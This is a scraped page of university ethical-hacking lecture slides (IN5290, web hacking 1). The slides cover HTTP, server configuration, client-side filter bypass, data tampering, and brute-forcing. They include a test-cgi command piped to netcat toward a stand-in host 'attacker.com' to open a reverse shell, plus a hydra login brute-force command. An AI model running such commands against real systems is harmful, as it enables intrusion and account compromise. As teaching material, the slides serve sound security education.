Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

Similar documents
Introduction to Ethical Hacking

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Networks, WWW, HTTP. Web Technologies I. Zsolt Tóth. University of Miskolc. Zsolt Tóth (University of Miskolc) Networks, WWW, HTTP / 35

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Lecture Overview. INF5290 Ethical Hacking. Lecture 4: Get in touch with services. Where are we in the process of ethical hacking?

INF5290 Ethical Hacking. Lecture 4: Get in touch with services. Universitetet i Oslo Laszlo Erdödi

Web Application Penetration Testing

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Lab 5: Web Attacks using Burp Suite

Hypertext Transport Protocol

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

NET 311 INFORMATION SECURITY

Web Programming Paper Solution (Chapter wise)

Information Security CS 526 Topic 11

Get in Touch Module 1 - Core PHP XHTML

CERTIFICATE IN WEB PROGRAMMING

Solutions Business Manager Web Application Security Assessment

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

CS631 - Advanced Programming in the UNIX Environment

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security

Information Security CS 526 Topic 8

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Hackveda Training - Ethical Hacking, Networking & Security

Security Course. WebGoat Lab sessions

Introduction to PHP. Handling Html Form With Php. Decisions and loop. Function. String. Array

Base64 The Security Killer

Basics of Web. First published on 3 July 2012 This is the 7 h Revised edition

The 4D Web Companion. David Adams

Web server reconnaissance

Uniform Resource Locators (URL)

How to work with HTTP requests and responses

Computer Networks. Wenzhong Li. Nanjing University

COMPUTER NETWORKS AND COMMUNICATION PROTOCOLS. Web Access: HTTP Mehmet KORKMAZ

Web Technology. COMP476 Networked Computer Systems. Hypertext and Hypermedia. Document Representation. Client-Server Paradigm.

Web Penetration Testing

CNIT 129S: Securing Web Applications. Ch 4: Mapping the Application

Detects Potential Problems. Customizable Data Columns. Support for International Characters

Web Site Design and Development. CS 0134 Fall 2018 Tues and Thurs 1:00 2:15PM

Web Security II. Slides from M. Hicks, University of Maryland

CMSC 332 Computer Networking Web and FTP

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Protocols. Networking CS 3470, Section 1 Sarah Diesburg

Crystal Enterprise. Overview. Contents. Web Server Overview - Internet Information System (IIS)

RKN 2015 Application Layer Short Summary

3. WWW and HTTP. Fig.3.1 Architecture of WWW

HTTP Protocol and Server-Side Basics

EEC-682/782 Computer Networks I

Session 8. Reading and Reference. en.wikipedia.org/wiki/list_of_http_headers. en.wikipedia.org/wiki/http_status_codes

5/10/2009. Introduction. The light-saber is a Jedi s weapon not as clumsy or random as a blaster.

Mobile Site Development

COSC 2206 Internet Tools. The HTTP Protocol

Human vs Artificial intelligence Battle of Trust

Web Security. Thierry Sans

Http Error Code 403 Forbidden Dreamweaver Mysql

Dreamweaver CS6. Table of Contents. Setting up a site in Dreamweaver! 2. Templates! 3. Using a Template! 3. Save the template! 4. Views!

last time: command injection

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

3. Apache Server Vulnerability Identification and Analysis

INTERNET ENGINEERING. HTTP Protocol. Sadegh Aliakbary

Java Applets, etc. Instructor: Dmitri A. Gusev. Fall Lecture 25, December 5, CS 502: Computers and Communications Technology

WebGoat Lab session overview

18050 (2.48 pages/visit) Jul Sep May Jun Aug Number of visits

Unusual Web Bugs. A Web App Hacker s Bag O Tricks. Alex kuza55 K.

How To Redirect A Webpage Cheat Sheet

Architecture. Steven M. Bellovin October 27,

Architecture. Steven M. Bellovin October 31,

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

SECURE CODING ESSENTIALS

USER MANUAL. SEO Hub TABLE OF CONTENTS. Version: 0.1.1

Lecture 7b: HTTP. Feb. 24, Internet and Intranet Protocols and Applications

Web Application Security Evaluation

Sample Exam Ethical Hacking Foundation

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Application Layer: The Web and HTTP Sec 2.2 Prof Lina Battestilli Fall 2017

Penetration Testing with Kali Linux

Full Stack Web Developer

Web Development. Lab. Bases de Dados e Aplicações Web MIEIC, FEUP 10/11. Sérgio Nunes

Chapter 27 WWW and HTTP Copyright The McGraw-Hill Companies, Inc. Permission required for reproduction or display.

CREATING WEBSITES. What you need to build a website Part One The Basics. Chas Large. Welcome one and all

How to start with 3DHOP

Web, HTTP and Web Caching

Internet programming Lab. Lecturer Mariam A. Salih

THE BCS PROFESSIONAL EXAMINATIONS BCS Level 5 Diploma in IT PRINCIPLES OF INTERNET TECHNOLOGIES. Specimen Answers

The World Wide Web. Internet

Copyright

Web Servers and Security

User Manual. version 1.6-r1

1. Oracle mod_plsql v in Oracle9i Application Server v1.0.2.x (Oracle9iAS v1.0.2.x)

Penetration Testing. James Walden Northern Kentucky University

Web Applications. Software Engineering 2017 Alessio Gambi - Saarland University

Chrome Extension Security Architecture

Transcription:

Lecture Overview IN5290 Ethical Hacking Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing Summary - how web sites work HTTP protocol Client side server side actions Accessing hidden contents Modifying client side data Brute-forcing forms, directories Web parameter tampering Universitetet i Oslo Laszlo Erdödi IN5290 2018 L05 Web hacking 1. 2 Hypertext Transfer Protocol (HTTP) Hypertext Transfer Protocol (HTTP) HTTP is the protocol for web communication. Currently version 1.0, 1.1 and 2.0 are in use (2.0 exits since 2015, almost all browsers support it by now). HTTP is used in a client server model. The client sends a request and receives answer from the server. Client Request Response Request Response Server Each request and response consist of a header and a body. The header contains all the necessary and additional information for the HTTP protocol. Request: Client Server The protocol version Request header The requested file Request body The webmethod (see later) The host name Response: Response header The web answer (in response) The date Response body The content type IN5290 2018 L05 Web hacking 1. 3 IN5290 2018 L05 Web hacking 1. 4

HTTP response splitting HTTP response splitting is an old vulnerability (still appears in 2018). In case of inappropriate validation of the requests, the client can provide misleading input (two new lines in the header indicates the end of the header). The attacker can force the server to cache a wrong server answer. Request header Fake body Fake header Request body Response header Response body Response header Response body Hypertext Transfer Protocol (HTTP) HTTP operates with several web methods. The main methods in use: GET - to download data POST - to send data (e.g. I posted something on facebook ) Other methods in use: HEAD to obtain the HTTP header PUT to place content on the server (e.g. restful services) Further existing methods: DELETE (to remove content), TRACE, DEBUG, OPTIONS (to see the available webmethod list) IN5290 2018 L05 Web hacking 1. 5 IN5290 2018 L05 Web hacking 1. 6 Hypertext Transfer Protocol telnet Hypertext Transfer Protocol with browser The web communication is basically done by the web browsers. The browsers can send optional values, such as content encoding, browser type, etc. IN5290 2018 L05 Web hacking 1. 7 IN5290 2018 L05 Web hacking 1. 8

Hypertext Transfer Protocol web answers (Http status codes) HTTP PUT method upload file 2xx: Success 200: OK 204: No content 3xx: Redirection 301: Moved permanently 302: Moved temporarily 304: Not modified 305: Use proxy 308: Permanent redirect 4xx: Client error 400: Bad request 403: Forbidden 404: File not found 405: Method not allowed 408: Request timeout 5xx: Server error 500: Internal server error 502: Bad gateway 504: Gateway timeout 505: Http version not supported PUT method was used to place and update website content before ftp. If it is enabled for a folder and the folder has permission to write then the attacker can take advantage of that vulnerability and upload arbitrary file. IN5290 2018 L05 Web hacking 1. 9 IN5290 2018 L05 Web hacking 1. 10 Accessing a webpage Client side Operating system Browser Html processing Javascript execution Flash execution HTTP request HTTP response Operating system Server side Web server app FTP Other services Server side Scripting engine CMS DB request DB response Webserver types and configuration Web server types and applications: Apache Internet Information Service (IIS, Microsoft) Nginx Lighttpd GWS (Google) others The web server is an application that is running under an OS. The user that runs the web server should have the least privileges. Never run a web server as a root! The webserver user has access to its own folder (webroot, e.g. /var/www, c:/inetpub, etc.) and the logging directory. IN5290 2018 L05 Web hacking 1. 11 IN5290 2018 L05 Web hacking 1. 12

Webserver configuration Webserver configuration (.htaccess) The webserver configuration file contains almost all the server settings. The server side script settings (e.g. where s the php binary), the index file extensions (in which order should the default page be considered, e.g: 1.index.php, 2.index.htm), default error messages (404 File not found page) have to be placed inside the conf file. apache2.conf example An.htaccess file is a way to configure the details of your website without altering the server config files. Main functions: Mod_Rewrite (is a very powerful and sophisticated module which provides a way to do URL manipulations) Authentication (require a password to access certain sections of the webpage) Custom error pages (e.g. for 400 Bad request, 404 File not found, 500 Internal Server Error) Mime types (add extra application files, e.g. special audio) Server Side Includes (for update common scripts of web pages) IN5290 2018 L05 Web hacking 1. 13 IN5290 2018 L05 Web hacking 1. 14 Client side How the browser process the html When the browser downloads the html file it is processed. The html can contain additional files: Pictures (usually: png, jpg, gif) Stylesheets (xss) Javascript codes Flash objects (swf) Tamper Data Firefox addon Tamper Data is a Firefox addon that is able to show all packets crossing the browser with their details. All additional content have an access address (local or global). During the processing all the additional content will be retrieved from the server with a separate web request. The main function is to view and modify the http/https header and POST data. Unfortunately Firefox Quantum does not support it, but there are other alternatives. IN5290 2018 L05 Web hacking 1. 15 IN5290 2018 L05 Web hacking 1. 16

Client side How the browser process the html The uio.no s index.html contains several pictures, stylesheets and javascript code. The browser downloads all step by step. Client side code Html example from uio.no: Javascript inserted Reference to a picture Reference to javascript Style sheets example from uio.no: IN5290 2018 L05 Web hacking 1. 17 IN5290 2018 L05 Web hacking 1. 18 Javascript Flash Alongside HTML and CSS, JavaScript is one of the three core technologies of the World Wide Web. JavaScript enables interactive web pages and thus is an essential part of web applications. The vast majority of websites use it, and all major web browsers have a dedicated JavaScript engine to execute it. As a multiparadigm language, JavaScript supports event-driven, functional, and imperative (including object-oriented and prototypebased) programming styles. It has an API for working with text, arrays, dates, regular expressions, and basic manipulation of the DOM, but the language itself does not include any I/O, such as networking, storage, or graphics facilities, relying for these upon the host environment in which it is embedded. Example: <script>alert( Hi! I m the Javascript Engine! );</script> IN5290 2018 L05 Web hacking 1. 19 Flash is a platform for viewing multimedia contents, executing rich Internet applications, and streaming audio and video. It can be embedded to web sites. Swf source example: Embedding flash object: Flash code example: IN5290 2018 L05 Web hacking 1. 20

Server side scripts Server side scripts are executed on the server side. Many languages exist: php, perl, ruby, java, asp, etc. After the execution a static html is generated and that is sent to the client. Php examples (php to html): <?php Print( <h1>hello John!</h1> );?> -> <h1>hello John!</h1> <?php $result = mysql_query( Select name from users where id=115 ); $name = mysql_fetch_array($result); Print( <h1>hello.$name.!</h1> );?> -> <h1>hello John!</h1> Content Management Systems (CMS) CMS are designed to create and modify the content of Web pages easily. The feature of CMS includes Web-based publishing, format management, history editing and version control, indexing, search, and retrieval. Typical CMS: Joomla Drupal WordPress If a vulnerability of CMS appears millions of websites can be vulnerable suddenly. IN5290 2018 L05 Web hacking 1. 21 IN5290 2018 L05 Web hacking 1. 22 Start compromising a website First use it in a normal way (find the linked subsites, contents, input fields) Decide whether it is a simple static site or it has complex dynamic content (server side scripts, database behind) Try to find not intended content (comments in source code Try to find hidden content without link (factory default folders, user folders, configuration files) Try to obtain as much info as it is possible (information disclosures) Force the site to error (invalid inputs) and see the result IN5290 2018 L05 Web hacking 1. 23 Information disclosure Example1: Find the hidden information (flag) on the following site: http://193.225.218.118/ctf/flag1 Example2: Find the hidden information (flag) on the following site: http://193.225.218.118/cybersmart/info2 IN5290 2018 L05 Web hacking 1. 24

Prohibited content for search engines - robots.txt Robots.txt is a file that has to be placed in the webroot folder. Search engine robots read the file and process all the disallowed entities. On the other hand it is an information disclosure. It also means that the listed entities exist. Dangerous default scripts: e.g. cgibin/test-cgi Cgi-bin is a protocol to execute programs through apache web server. Test-cgi is a default file. The current directory content can be listed with it: GET /cgi-bin/test-cgi?* The root directory: GET /cgi-bin/test-cgi?/* Execute command with pipe (reverse shell): "GET /cgi-bin/test-cgi?/*" nc attacker.com 80 IN5290 2018 L05 Web hacking 1. 25 IN5290 2018 L05 Web hacking 1. 26 Directory brute-force / dirb Different web servers use different default folders and default files. Dirb has collections of typical webserver related folder names. Directory brute-force / dirb Dirb also has unified dictionaries (big.txt, common.txt, etc. Dirb brute-forces the folders and files using the dictionaries. Example: Use dirb to find hidden content on http://193.225.218.118 IN5290 2018 L05 Web hacking 1. 27 IN5290 2018 L05 Web hacking 1. 28

Client side filtering Web developer extension Input filtering can be done on the client side. Client side input filtering is not input validation! Any data on the client sidecanbemodified(it smybrowsericandecidewhat data will be sent out). Typical input filtering: Form elements with restrictions (max length of input, restriction for special characters, only special characters are allowed, predefined input option e.g. radiobutton, combo) Javascript filtering (the javascript is running on client side, more complex validation can be done) Client side filtering can be bypassed easily, that practically means no additional security IN5290 2018 L05 Web hacking 1. 29 Web developer extension provides several features to modify the client side appearance. It can modify the form elements, disable javascript, remove validations, etc. Example: Find the flag on that site: http://193.225.218.118/ctf/flag4 Use the web developer extension! IN5290 2018 L05 Web hacking 1. 30 Tamper data modifying outgoing traffic Tamper data is also for modifying the outgoing traffic. By clicking on the start tamper button we can intercept the traffic and modify the outgoing requests. Chrome postman Postman interceptor can set custom headers (including cookies) and view cookies already set on the domain. IN5290 2018 L05 Web hacking 1. 31 IN5290 2018 L05 Web hacking 1. 32

Burpsuite Burp Suite is a tool for testing Web application security. It provides a proxy server, and several features to smart-alter the web traffic. For example every packet can be resent by the repeater module and edited before at byte level. Any client side validation can be bypassed with Burp. Brute force with hydra Hydra can be used for http brute-forcing as well. Similarly to the previously discussed protocols the username (username file) and the password (password file) have to be provided. Contrary to the previous cases Hydra needs a keyword to identify negative answers (reverse brute-force). Example: hydra -l username -P passwordfile url.to.bf http-post-form "/portal/xlogin/:ed=^user^&pw=^pass^:f=invalid" Practice example: Find valid usernames for the form here: http://193.225.218.118/hydra.php IN5290 2018 L05 Web hacking 1. 33 IN5290 2018 L05 Web hacking 1. 34 End of lecture INF5290 2018 L05 Web hacking 1. 35

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback